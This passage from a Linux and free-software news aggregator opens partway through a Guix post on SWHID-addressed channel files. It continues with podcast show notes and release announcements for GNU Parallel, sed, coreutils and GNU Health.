But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?

As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- …

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.

The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

  •  

Late Night Linux – Episode 385

Voice to text, visualising CSVs in the terminal, managing software from releases on GitHub, a mini Android tablet for your wall, and Amiga music on Linux in Discoveries. Plus Ubuntu embracing AI makes us wonder if we should just stop having the same old arguments.

 

Discoveries

VoxType

Tennis

tooler

SONOFF NSPanel Pro Gen2

Unix Amiga Delitracker Emulator

 

News/discussion

The future of AI in Ubuntu

I wanted to reply with some clarifications

The Pulse: token spend breaks budgets – what next?

Anthropic joins the Blender Development Fund as Corporate Patron

Upcoming Blender Development Fund and AI Policies

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

Amin Bandali: FFS code review with Protesilaos

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

Yesterday we had our second session focused on ffs, which I recorded and share publicly with everyone with Prot's permission, so that others can also benefit from Prot's insights and experience as we discuss various aspects of Emacs package development with the concrete example of ffs.

Here is the video recording of our session:

You can view or download the full-resolution video from the Internet Archive.

I addressed most of Prot's feedback about ffs from our first session, and I'll be working on the changes we discussed in this session in the next days.

In the last third of the video we switched topics to discuss a few Emacs-related tangents including adding a 'padding' effect for the mode line and its constructs, and distilling and separating the easily-reusable package-like parts of one's Emacs configuration from the actual configuration of those parts (e.g. the distinction of prot-lisp and prot-emacs-modules in Prot's Emacs configuration).

For mode line padding, here is the snippet I'm using with Prot's doric-themes:

(doric-themes-with-colors
  (custom-set-faces
   `(mode-line
     ((t :box (:line-width 6 :color ,bg-shadow-intense))))
   `(mode-line-inactive
     ((t :box (:line-width 6 :color ,bg-shadow-subtle))))
   `(mode-line-highlight
     ((t :box (:color ,bg-shadow-intense))))))

Take care, and so long for now.

  •  

2.5 Admins 298: Windows Postdate

Microsoft is encouraging employees with the most experience to leave the company and letting users pause Windows updates forever, some of the best features you’ll get in the version of ZFS that ships with the new Ubuntu LTS, and backing up data from cloud services.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Extending ZFS Performance Without Hardware Upgrades

 

News/discussion

Microsoft tackles quality control issues. Just kidding, it’s encouraging experienced workers to leave

Your Windows update experience just got updated

zfs-2.3.0

zfs-2.4.0

 

Free consulting

We were asked about backing up data from cloud services.

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

 

  •  

Late Night Linux – Episode 384

There’s a new Ubuntu LTS release and quite a lot is new, Canonical’s infrastructure was taken down and we disagree about whether it could have been avoided, two recent examples of irresponsible vulnerability disclosure, and the Steam controller finally arrives with a hefty price tag.

 

Plugs

Piss up at The Shipwrights Arms (just next to London Bridge station) on Saturday 27th June from 6pm until late

SeaGL 2026 Call for Presentations

 

News

Canonical releases Ubuntu 26.04 LTS Resolute Raccoon

Ubuntu 26.04 LTS: What’s New Since Ubuntu 24.04?

An update on rust-coreutils

Pro-Iran group turns Ubuntu DDoS into shakedown

The most severe Linux threat to surface in years catches the world flat-footed

Carrot disclosure: Forgejo and follow-up

Steam Controller: The Ars Technica review

 

 

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

www @ Savannah: Malware in Proprietary Software - Latest Additions

The initial injustice of proprietary software often leads to further injustices: malicious functionalities.

The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.

We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.

Here are our latest additions

April 2026

Proprietary Obsolescence


Malware in Appliances

  •  

Hybrid Cloud Show – Episode 55

A recent attack shone a light on some of the problems with GitHub Actions, and CI/CD more generally. As tempting as it might be, going back to shell scripts probably isn’t the answer.

 

1K+ cloud environments infected following Trivy supply chain attack

2.5 Admins 292: Trivyally Infected

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with early episodes sometimes

 

 

 

 

 

Subscribe to the RSS feed.

  •  

health @ Savannah: GNU Health featured at the Cyber|Show UK

GNU Health at the Cyber|Show!
Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️

They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications.

The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️
https://cybershow ... pisodes.php?id=64

About Cyber|Show:
https://cybers ... w.uk/about.php

Get this and latest news about GNU Health from our official Mastodon account:
https://mastodon. ... social/@gnuhealth

Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow

  •  

2.5 Admins 297: Jraphics

Hitting the limit for hard links, a parent struggles to get back into their teen’s compromised Discord account, the demise of tower PCs and general purpose computing in general, and changing the properties of existing ZFS pools.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Compensating for RAM Constraints with L2ARC on ZFS

 

News/discussion

How Jennifer Aniston and Friends Cost Us 377GB and Broke ext4 Hardlinks

Dad stuck in support nightmare after teen lied about age on Discord

Apple’s last tower topples… and the others will follow

 

Free consulting

We were asked about changing the properties of existing ZFS pools.

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Late Night Linux – Episode 383

Whether you can trust small new distros, Amazon is officially abandoning Android on its new TV sticks in favour of their new Linux-based OS, and we have another pointless argument about AI bollocks.

 

News/discussion

Amazon won’t release Fire Sticks that support sideloading anymore

Eternal November — this new influx of users may be better than the last one

 

 

 

 

 

 

 

 

  •  

Linux After Dark – Episode 120

Chris ended up with a managed M4 Macbook Air at work with no sudo or root. So how does a Linux user get on with his first ever Mac? Turns out pretty well, thanks to lots of open source software and a terminal.

 

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with some early episodes

 

 

 

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed.

  •  

parallel @ Savannah: GNU Parallel 20260422 ('Artemis II') released

GNU Parallel 20260422 ('Artemis II') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

  It is a fantastic tool for decades!
    -- Ops_Mechanic@reddit

New in this release:

  • Remote jobs are spawned via pipe to perl, so environment can be bigger. This is a major rewrite.
  • --pipe-part -a supports -L/-N if zextract is installed.
  • --pipe-part -a supports .gz, .bz2, .zst-files if zextract is installed.
  • Comments in code is redone.
  • Bug fixes and man page updates.


GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.


About GNU Parallel


GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

  parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

  find . -name '*.jpg' |
    parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/

You can install GNU Parallel in just 10 seconds with:

    $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
       fetch -o - http://pi.dk/3 ) > install.sh
    $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
    12345678 c555f616 391c6f7c 28bf9380 44f4ec50
    $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
    70727536 3428aa9e 9a136b9a 7296dfe4
    $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
    83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
    b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
    $ bash install.sh

Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.

If you like GNU Parallel:

  • Give a demo at your local user group/team/colleagues
  • Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
  • Get the merchandise https://gnuparall ... igns/gnu-parallel
  • Request or write a review for your favourite blog or magazine
  • Request or build a package for your favourite distribution (if it is not already there)
  • Invite me for your next conference


If you use programs that use GNU Parallel for research:

  • Please cite GNU Parallel in you publications (use --citation)


If GNU Parallel saves you money:



About GNU SQL


GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.


About GNU Niceload


GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

  •  

2.5 Admins 296: Beware of the Leopard

Microsoft locks devs out of important accounts, the foreign router ban exemptions make even less sense, Backblaze shows that “unlimited” never means that, and attempting to avoid software that’s written with AI.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Do More with Less: Cost-Efficient Storage on the New TrueNAS with Enhanced Fast Dedup

The Hidden Value of CPU-Intensive Compression on Modern Hardware

 

News/discussion

Microsoft locks out VeraCrypt and WireGuard devs, blames verification process

Action Required: Account Verification for Windows Hardware Program Begins October 16, 2025

FCC exempts Netgear from ban on foreign routers, doesn’t explain why

Backblaze has quietly stopped backing up your data

 

Free consulting

We were asked about avoiding software that’s written with AI.

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

sed @ Savannah: sed-4.10 released [stable]


This is to announce sed-4.10, a stable release.

It's been more than 3.5 years and quite a few new bug fixes.
Special thanks to Paul Eggert, Bruno Haible and Collin Funk
for all their help, and especially to Bruno for all the gnulib
support and thorough and indefatigable testing and analysis.

There have been 92 commits by 9 people in the 180 weeks since 4.9.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

  Arkadiusz Drabczyk (2)
  Ash Roberts (1)
  Brun Haible (1)
  Bruno Haible (5)
  Collin Funk (5)
  Hans Ginzel (1)
  Jim Meyering (60)
  Paul Eggert (16)
  Weixie Cui (1)

Jim
 [on behalf of the sed maintainers]
==================================================================

Here is the GNU sed home page:
    https://gnu.org/s/sed/

Here are the compressed sources:
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz   (2.7MB)
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz   (1.7MB)

Here are the GPG detached signatures:
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz.sig
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  SHA256 (sed-4.10.tar.gz) = TRef+vkuxNzsVB98Ayvhw7mhhW9JcK25WlBSIXAvUnc=
  SHA3-256 (sed-4.10.tar.gz) = ftB7Hf2uN4RnayBEgasV7KmqZqCxBUj7e+Am6WDaiKk=
  SHA256 (sed-4.10.tar.xz) = uOchgrLslqNXTimYxHt6qmTMIM4ADY6awxPMB87PKMc=
  SHA3-256 (sed-4.10.tar.xz) = bVWJvXR28fvhgP1XTpej6t8V+Bh2YI1lL6aGBy1cG5c=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify sed-4.10.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096/0x7FD9FCCB000BEEEE 2010-06-14 [SCEA]
        Key fingerprint = 155D 3FC5 00C8 3448 6D1E  EA67 7FD9 FCCB 000B EEEE
  uid                   [ unknown] Jim Meyering <jim@meyering.net>
  uid                   [ unknown] Jim Meyering <meyering@fb.com>
  uid                   [ unknown] Jim Meyering <meyering@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key jim@meyering.net

  gpg --recv-keys 7FD9FCCB000BEEEE

  wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=sed&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify sed-4.10.tar.gz.sig

This release is based on the sed git repository, available as

  git clone https://https.git.savannah.gnu.org/git/sed.git

with commit 89b7a2224d4faa9d8baf76094b1232ad1477ef3e tagged as v4.10.

For a summary of changes and contributors, see:

  https://gitweb.git.savannah.gnu.org/gitweb/?p=sed.git;a=shortlog;h=v4.10

or run this command from a git-cloned sed directory:
  git shortlog v4.9..v4.10

This release was bootstrapped with the following tools:
  Autoconf 2.73.1-b400b
  Automake 1.18.1.91
  Gnulib 2026-04-19 15211966deb52d4cae425c655177a815a88d3fc0

NEWS

* Noteworthy changes in release 4.10 (2026-04-21) [stable]

** Bug fixes

  sed 's/a/b/g' (and other global substitutions) now works on input
  lines longer than 2GB. Previously, matches beyond the 2^31 byte offset
  would evoke a "panic" (exit 4).
  [bug present since the beginning]

  'sed --follow-symlinks -i' no longer has a TOCTOU race that could let
  an attacker swap a symlink between resolution and open, causing sed to
  read attacker-chosen content and write it to the original target.
  [bug introduced in sed 4.1e]

  sed no longer falsely matches when back-references are combined with
  optional groups (.?) and the $ anchor.  For example, this no longer
  falsely matches the empty string at beginning of line:
    $ echo ab | sed -E 's/^(.?)(.?).?\2\1$/X/'
    Xab
  [bug present since "the beginning"]

  In --posix mode, sed no longer mishandles backslash escapes (\n,
  \t, \a, etc.) after a named character class like [[:alpha:]].
  For example, 's/^A\n[[:alpha:]]\n*/XXX/' would fail to match the
  trailing newline, treating \n as a literal backslash and an 'n'
  rather than a newline.  This happened when an earlier backslash
  escape in the same regex had already been converted, shifting the
  in-place normalization buffer.
  [bug introduced in sed 4.9]

  sed --debug no longer crashes when a label (":") command is compiled
  before the --debug option is processed, e.g., sed -f<(...) --debug.
  [bug introduced in sed 4.7 with --debug]

  sed no longer rejects the documented GNU extension 'a**' (equivalent
  to 'a*') in Basic Regular Expression (BRE) mode.  Previously, this
  worked only with -E (ERE mode), even though grep has always accepted
  it in BRE mode.
  [bug present since "the beginning"]

  sed no longer rejects "\c[" in regular expressions
  [bug present since the beginning]

  'sed --follow-symlinks -i' no longer mishandles an operand that is a
  short symbolic link to a long symbolic link to a file.
  [bug introduced in sed 4.9]

  Fix some some longstanding but unlikely integer overflows.
  Internally, 'sed' now more often prefers signed integer arithmetic,
  which can be checked automatically via 'gcc -fsanitize=undefined'.

** Changes in behavior

  In the default C locale, diagnostics now quote 'like this' (with
  apostrophes) instead of `like this' (with a grave accent and an
  apostrophe).  This tracks the GNU coding standards.

  'sed --posix' now warns about uses of backslashes in the 's' command
  that are handled by GNU sed but are not portable to other
  implementations.

** Build-related

  builds no longer fail on platforms without the <getopt.h> header or
  getopt_long function.
  [bug introduced in sed 4.9]


  •  

coreutils @ Savannah: coreutils-9.11 released [stable]


This is to announce coreutils-9.11, a stable release.

Notable changes include:
 - cut(1), nl(1), and un/expand(1) are multi-byte character aware
 - cut(1) supports new -w, -F, -O options for better compatibility
 - cat(1) and yes(1) use zero-copy I/O on Linux (up to 15x faster)
 - date(1) now parses dot delimited dd.mm.yy format
 - cksum --check uses more defensive file name quoting
 - shuf -i operates up to 2x faster by using unlocked stdio
 - wc -l operates up to 4.5x faster on hosts with neon instructions
 - wc -m is up to 2.6x faster when processing multi-byte characters

There have also been many bug fixes and other changes
as summarized in the NEWS below.

There have been 306 commits by 12 people in the 10 weeks since 9.10
Thanks to everyone who has contributed!

  Bruno Haible (2)                Paul Eggert (15)
  Chris Down (2)                  Pádraig Brady (156)
  Collin Funk (91)                Sam James (1)
  Dr. David Alan Gilbert (1)      Sylvestre Ledru (17)
  Gabriel (1)                     Weixie Cui (2)
  Lukáš Zaoral (2)                oech3 (19)

Pádraig [on behalf of the coreutils maintainers]
==================================================================

Here is the GNU coreutils home page:
    https://gnu.org/s/coreutils/

Here are the compressed sources:
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz   (16MB)
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz   (6.3MB)

Here are the GPG detached signatures:
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz.sig
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  SHA256 (coreutils-9.11.tar.gz) = IDO4owScBr/0mp486nK99Gg7zQy+uXUhHdVtuvi3Nq4=
  SHA3-256 (coreutils-9.11.tar.gz) = TwFrSgPuppf+jNggT+aXj037UfVVS2BmYBxXiPLYKxs=
  SHA256 (coreutils-9.11.tar.xz) = OUAk7aCllVIXztqc0SAeZdyPo6opwpURNaSVIdV8PMM=
  SHA3-256 (coreutils-9.11.tar.xz) = RkpNMip8O4ly+z3Fef9X20AsotbT1ycBZ5UbG84SiNM=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify coreutils-9.11.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]
        Key fingerprint = 6C37 DC12 121A 5006 BC1D  B804 DF6F D971 3060 37D9
  uid                   [ultimate] Pádraig Brady <P@draigBrady.com>
  uid                   [ultimate] Pádraig Brady <pixelbeat@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key P@draigBrady.com

  gpg --recv-keys DF6FD971306037D9

  wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify coreutils-9.11.tar.gz.sig

This release is based on the coreutils git repository, available as

  git clone https://https.git.savannah.gnu.org/git/coreutils.git

with commit c01fd163a47468a8296fb369f5233853bb551bb6 tagged as v9.11.

For a summary of changes and contributors, see:

  https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.11

or run this command from a git-cloned coreutils directory:

  git shortlog v9.10..v9.11

This release was bootstrapped with the following tools:
  Autoconf 2.73.1-b400b
  Automake 1.18.1
  Gnulib 2026-04-19 fb7312fa8d3df29f0ca0678f669b9a5b88a078ec
  Bison 3.8.2

NEWS

* Noteworthy changes in release 9.11 (2026-04-20) [stable]

** Bug fixes

  'dd' now always diagnoses partial writes correctly upon write failure.
  Previously it may have indicated that only full writes were performed.
  [This bug was present in "the beginning".]

  'fold' will no longer truncate output when encountering 0xFF bytes.
  [bug introduced in coreutils-9.8]

  'fold' is again responsive to its input.  Previously it would have delayed
  processing until 256KiB was read from the input.
  [bug introduced in coreutils-9.8]

  'kill --help' now has links to valid anchors in the html manual.
  [bug introduced in coreutils-9.10]

  When configured with --enable-systemd, the commands 'pinky',
  'uptime', 'users', and 'who' no longer consider the systemd session
  classes 'greeter', 'lock-screen', 'background', 'background-light',
  and 'none' to be users.
  [bug introduced in coreutils-9.4]

  'pwd' on ancient systems will no longer overflow a buffer
  when operating in deep paths longer than twice the system PATH_MAX.
  [bug introduced in coreutils-9.6]

  'stat --printf=%%N' no longer performs unnecessary checks of the QUOTING_STYLE
  environment variable.
  [bug introduced in coreutils-8.26]

  'timeout' no longer exits abruptly when its parent is the init process, e.g.,
  when started by the entrypoint of a container.
  [bug introduced in coreutils-9.10]

** New Features

  'cut' now supports multi-byte input and delimiters.  Consequently
  the -c option is now honored, and no longer an alias for -b, and
  the -n option is now honored, and no longer ignored.
  Also the -d option supports multi-byte delimiters.

  'cut' adds new options for better compatibility:
  The -w,--whitespace-delimited option was added to support blank aligned fields
  and for better compatibility with FreeBSD/macOS.
  The -O option was added as an alias for the --output-delimiter option,
  for better compatibility with busybox/toybox.
  The -F option was added as an alias for -w -O ' '
  for better compatibility with busybox/toybox.

  'date --date' now parses dot delimited dd.mm.yy format common in Europe.
  This is in addition to the already supported mm/dd/yy and yy-mm-dd formats.

** Changes in behavior

  'cksum --check' now uses shell quoting when required, to more robustly
  escape file names output in diagnostics.
  This also affects md5sum, sha*sum, and b2sum.

** Improvements

  'cat' now uses zero-copy I/O on Linux when appropriate, to improve throughput.
  E.g., throughput improved 6x from 12.9GiB/s to 81.8GiB/s on a Power10 system.

  'df --local' recognises more file system types as remote.
  Specifically: autofs, ncpfs, smb, smb2, gfs, gfs2, userlandfs.

  'df' improves duplicate mount suppression, by checking each mount against
  all previously kept entries for the same device, not just the latest one.

  'expand' and 'unexpand' now support multi-byte characters.

  'groups' and 'id' will now exit sooner after a write error,
  which is significant when listing information for many users.

  'install' now allows the combination of the --compare and
  --preserve-timestamps options.

  'fold', 'join', 'numfmt', 'uniq' now use more consistent blank character
  determination on non GLIBC platforms.  For example \u3000 (ideographic space)
  will be considered a blank character on all platforms.

  'nl' now supports multi-byte --section-delimiter characters.

  'shuf -i' now operates up to two times faster on systems with unlocked stdio
  functions.

  'tac' will now exit sooner after a write error, which is significant when
  operating on a file with many lines.

  'timeout' now properly detects when it is reparented by a subreaper process on
  Linux instead of init, e.g., the 'systemd --user' process.

  'wc -l' now operates up to four and a half times faster on hosts that support
  Neon instructions.

  'wc -m' now operates up to 2.6 times faster on GLIBC when processing
  non-ASCII UTF-8 characters.

  'yes' now uses zero-copy I/O on Linux to significantly increase throughput.
  E.g., throughput improved 15x from 11.6GiB/s to 175GiB/s on a Power10 system.

** Build-related

  ./configure --enable-single-binary=hardlinks is now supported on systems
  with dash as the system shell at /bin/sh.
  [issue introduced in coreutils-9.10]

  The test suite may have failed with a "Hangup" error if run non-interactively.
  [issue introduced in coreutils-9.10]


  •  

health @ Savannah: GNU Health GTK client 5.0.2 released

Dear community

The GTK client 5.0.2 of the GNU Health Hospital and Health Management system has been released!

This is a maintenance patchset that fixes the following issues:

  • Unknown icon error when registering gnu health local icons
  • Swapped Export - import icons
  • Update connection port number in README file
  • GNU Health GTK client does not automatically discover plugins from gnuhealth_plugins


You can get the latest GNU Health client from GNU.org, Python Package Index or Codeberg.

Happy hacking!

  •  

Linux Dev Time – Episode 148

We get into dependency management. The pros and cons of tools like Dependabot, the varying approaches with different languages and standard library sizes, the times when pinning dependencies makes sense, and more.

 

Turn Dependabot Off

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 146

In the wake of Discord’s recent announcement about age verification, Matrix recently came in for a lot of criticism by a lot of people who said it’s not a viable replacement. Andy works on Matrix for a living and Amolith is invested in the XMPP world so we get into secure messaging, trade-offs between security and user experience, federation, and more.

 

Piss up at The Shipwrights Arms (just next to London Bridge station) on Saturday 27th June from 6pm until late

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 144

People often like to talk down Electron, but it is really that bad? There may be better ways to use Web technologies to make desktop apps, but isn’t having Linux versions of apps a good thing no matter how they are made?

 

We mentioned Tauri and Wails.

 

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 143

The career progression options you have as a software engineer, moving from junior to senior dev, other paths you can go down like architecture or tech lead, and why management isn’t for everyone.

 

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

 

 

💾

  •  

Linux Dev Time – Episode 140

What we are likely to be doing when you hear this, and why it’s unlikely to involve much in the way of development. This is a short episode because Joe is having a break for the Christmas period.

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 139

How far you can go with eliminating global variables, forcing everything you ever need to be passed in as arguments.

 

 

 

 

Tailscale

Tailscale is an easy to deploy, zero-config, no-fuss VPN that allows you to build simple networks across complex infrastructure. Go to tailscale.com/ldt and try Tailscale out for free for up to 100 devices and 3 users, with no credit card required. Use code LATENIGHTLINUX for three free months of any Tailscale paid plan.

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 135

With constant news stories about security issues with developer-published software in package managers like npm, we weigh up the pros and cons of this approach to distributing open source software.

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 132

A lot of key open source software is paid for by large companies. That has some advantages, but it can also cause some issues. Maybe it would be better if more FOSS development was paid for by smaller companies and contributions from users.

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 131

We explore the differences between terms like coder, software developer, engineer, and architect. They are often used interchangeably, but there can be real differences between them. Or at least once upon a time there were differences.

 

 

 

Vibe coders are in for a shock. Writing code was never that hard.

Don’t Let Architecture Astronauts Scare You

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 130

Not invented here syndrome is very common in open source. We get into why that is, when it makes sense to start your own project from scratch, and how contributing to existing software can sometimes be better for everyone.

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 129

With the recent news of Bcachefs (probably) being removed from the Linux kernel, we are joined by Allan Jude from 2.5 Admins and Klara to discuss some of what we think went wrong, how to manage and maintain multiple releases of a project at once, and why release engineering is an important concept.

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 127

When and how to use benchmarking in your project, why it’s hard, and why optimising your code can be even harder.

 

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 126

How we deal with complex projects involving non-technical people as well as developers. How to manage expectations about timing, how to deal with issues, why documenting conversations is important, and more.

 

 

 

 

 

